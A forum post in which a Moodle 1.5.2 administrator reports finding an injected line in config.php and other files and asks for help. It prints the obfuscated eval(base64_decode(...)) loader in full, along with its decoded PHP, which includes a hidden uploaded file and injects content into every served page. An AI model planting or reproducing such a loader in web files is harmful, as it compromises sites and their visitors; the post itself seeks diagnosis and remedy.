Wow ! Thanks for all the helpful responses on this moodle problem that start several days ago. The Moodle community is amazing !
Sure enough, I found something that indicates the moodle site has been hacked.
In the files config.php , install.php (and others) I foundthe following line at the very top:<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9lbGVjdHJpMS9wdWJsaWNfaHRtbC91cGxvYWRkYXRhLzYvbW9kZGF0YS9hc3NpZ25tZW50LzgxLzQxNS9tZGxfdXRmLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2VsZWN0cmkxL3B1YmxpY19odG1sL3VwbG9hZGRhdGEvNi9tb2RkYXRhL2Fzc2lnbm1lbnQvODEvNDE1L21kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
Using using the base64 decoder at <http://www.motobit.com/util/base64-decoder-encoder.asp>)
I found that this decodes to:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/electri1/public_html/uploaddata/6/moddata/assignment/81/415/mdl_utf.php')){include_once('/home/electri1/public_html/uploaddata/6/moddata/assignment/81/415/mdl_utf.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
So I think my moodle site has been hacked ! Ug !
I know I have been amiss in not upgrading from the current version of moodle (1.5.2).
but I have been stuck for two reasons:
1. When I tried to upgrade two years ago using the fantastico, it completely garbled the
MYSQL database. Fortunately the webhost (siteground) was able to restore from
a recent backup. This caused me days of stress and frustration.
2. When I try to backup a course, Moodle prints a list of backup actions and then just
stops with "done" displayed on the bottom of the browser. Without a course backup
I cannot transfer it to a new installation.
3. Moodle 1.5.2 has been working well otherwise, until now.
It is still working except for the ability to edit courses. Whenever I click on an edit, move, or delete icon,
I get a blank page.
Should just edit the line out of the PHP files ?How did the hacker gain access to these files to change them ?Thanks, Tim